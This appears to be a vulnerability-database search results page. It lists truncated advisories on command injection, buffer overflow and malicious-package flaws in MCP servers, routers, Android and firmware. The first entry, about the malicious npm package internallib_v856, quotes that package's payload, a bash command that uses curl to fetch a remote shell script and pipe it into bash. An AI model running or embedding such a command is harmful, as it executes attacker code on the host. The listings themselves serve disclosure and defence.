
32 matches found

OSV
added 2026/06/12 3:28 p.m. | 5 views

MAL-2026-5694 Malicious code in internallib_v856 (npm)

Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a. The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

5.6 AI score
Exploits 0 | References 2
CVE
added 2026/05/27 12:00 a.m. | 11 views

CVE-2026-36045

CVE-2026-36045 affects picoclaw up to v0.1.2 (and earlier). The issue is an OS command injection in the ExecTool component (pkg/tools/shell.go) caused by an incomplete denylist in guardCommand() that attempts to restrict shell execution. The vulnerability description is consistently reported acro...

7.3 CVSS | 5.9 AI score | 0.01314 EPSS
Exploits 0 | References 2
ATTACKERKB
added 2026/05/01 8:15 p.m. | 1 view

CVE-2026-7593

A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function execute_command of the file src/index.ts of the component MCP Interface. The manipulation leads to OS command injection. Remote exploitation of the attack is possible. T...

7.5 CVSS | 6.6 AI score | 0.01362 EPSS
Exploits 0 | References 5 | Affected Software 1
Cvelist
added 2026/05/01 8:15 p.m. | 29 views

CVE-2026-7593 Sunwood-ai-labs command-executor-mcp-server MCP index.ts execute_command os command injection

A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function execute_command of the file src/index.ts of the component MCP Interface. The manipulation leads to OS command injection. Remote exploitation of the attack is possible. T...

7.5 CVSS | 0.01362 EPSS
Exploits 0 | References 5
Positive Technologies
added 2026/03/02 12:00 a.m. | 2 views

PT-2026-22594

Name of the Vulnerable Software and Affected Versions: Tenda W20E version 4.0br V15.11.0.6. Description: A command injection issue exists in the Tenda W20E router firmware. The firmware does not properly validate the usbPartitionName variable before using it within the doSystemCmd function. This can...

10 CVSS | 6.2 AI score | 0.02161 EPSS
Exploits 1 | References 10
RedhatCVE
added 2026/02/12 1:03 a.m. | 7 views

CVE-2024-26479

An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the Command execution function...

5.3 CVSS | 5.7 AI score | 0.00534 EPSS
Exploits 1 | References 1
NVD
added 2026/01/07 6:15 p.m. | 6 views

CVE-2025-61492

A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input...

10 CVSS | 0.01891 EPSS
Exploits 1 | References 3
Positive Technologies
added 2026/01/07 12:00 a.m. | 4 views

PT-2026-1826

Name of the Vulnerable Software and Affected Versions: terminal-controller-mcp version 0.1.7. Description: A command injection issue exists in the execute command function of the software. Attackers can execute arbitrary commands by providing a crafted input. The vulnerability can lead to arbitrary...

10 CVSS | 8.4 AI score | 0.01891 EPSS
Exploits 1 | References 6
CNNVD
added 2026/01/07 12:00 a.m. | 2 views

Terminal Controller for MCP security vulnerability

Terminal Controller for MCP is a context protocol server by the individual developer GongRzhe. A security vulnerability exists in Terminal Controller for MCP version 0.1.7, which stems from a command injection in the execute_command function that could lead to the execution of arbitrary commands...

10 CVSS | 7.3 AI score | 0.01891 EPSS
Exploits 1 | References 3
EUVD
added 2025/10/07 12:30 a.m. | 3 views

EUVD-2008-5012

Malware in sbrugna...

7.8 CVSS | 6.1 AI score | 0.02589 EPSS
Exploits 0 | References 11
EUVD
added 2025/10/07 12:30 a.m. | 2 views

EUVD-2007-1953

Malware in sbrugna...

10 CVSS | 6.2 AI score | 0.01376 EPSS
Exploits 0 | References 3
EUVD
added 2025/10/03 8:07 p.m. | 6 views

EUVD-2025-25100

Malicious code in bioql PyPI...

6.2 AI score | 0.00153 EPSS
Exploits 0 | References 7
VulnCheck KEV
added 2025/09/15 12:00 a.m. | 12 views

VulnCheck KEV: CVE-2025-45988

Blink routers BL-WR9000 V2.4.9, BL-AC2100AZ3 V1.0.4, BL-X10AC8 v1.0.5, BL-LTE300 v1.2.3, BL-F1200AT1 v1.0.0, BL-X26AC8 v1.2.8, BLAC450MAE4 v4.0.0 and BL-X26DA3 v1.2.7 were discovered to contain multiple command injection vulnerabilities via the cmd parameter in the bsSetCmd function...

9.8 CVSS | 5.8 AI score | 0.09689 EPSS
In wild | Exploits 1 | References 3
NVD
added 2025/08/26 11:15 p.m. | 2 views

CVE-2025-22408

In rfc_check_send_cmd of rfc_utils.cc, there is a possible way to execute arbitrary code due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation...

9.8 CVSS | 0.00374 EPSS
Exploits 0 | References 2
CVE
added 2025/08/26 10:48 p.m. | 71 views

CVE-2025-22408

CVE-2025-22408 affects Google Android in the rfc_check_send_cmd function of rfc_utils.cc, caused by a use-after-free; this enables remote code execution with no extra privileges and without user interaction. Public documents confirm the issue as a System-level vulnerability in Android, with CVSS ...

9.8 CVSS | 8 AI score | 0.00374 EPSS
Exploits 0 | References 2 | Affected Software 1
CVE
added 2025/07/11 3:24 p.m. | 65 views

CVE-2025-7027

Gigabyte Gigabyte UEFI SMM vulnerabilities (CVE-2025-7027) allow a local attacker to control both read and write addresses in SMRAM via the SwSmiInputValue 0xB2 handling, using an unvalidated UEFI NVRAM pointer (SetupXtuBufferAddress) and an attacker-controlled RBX-based pointer to perform arbitr...

8.2 CVSS | 6.8 AI score | 0.00199 EPSS
Exploits 0 | References 4
Positive Technologies
added 2025/06/18 12:00 a.m. | 3 views

PT-2025-26106

Name of the Vulnerable Software and Affected Versions: Linux kernel, affected versions not specified. Description: A potential off-by-one overflow issue has been identified in the Linux kernel, specifically in the il4965_rs_fill_link_cmd function. This issue arises when the value of idx equals LINK...

5.7 AI score
Exploits 0 | References 15
NVD
added 2025/02/12 7:15 p.m. | 17 views

CVE-2025-25343

Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the formexeCommand function...

9.8 CVSS | 0.00655 EPSS
Exploits 1 | References 1
CNNVD
added 2024/09/06 12:00 a.m. | 3 views

DrayTek Vigor3900 security vulnerability

DrayTek Vigor3900 is a high-performance router for enterprise networks from China-based DrayTek. A security vulnerability exists in the DrayTek Vigor3900 v1.5.1.6, which is caused by an authenticated command injection vulnerability via the name parameter in the runcommand function...

8.8 CVSS | 7.5 AI score | 0.01902 EPSS
Exploits 1 | References 2
OSV
added 2024/03/27 3:15 p.m. | 4 views

CVE-2024-2980

A vulnerability, which was classified as critical, has been found in Tenda FH1202 1.2.0.14408. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The...

8.8 CVSS | 6.4 AI score
Exploits 0 | References 4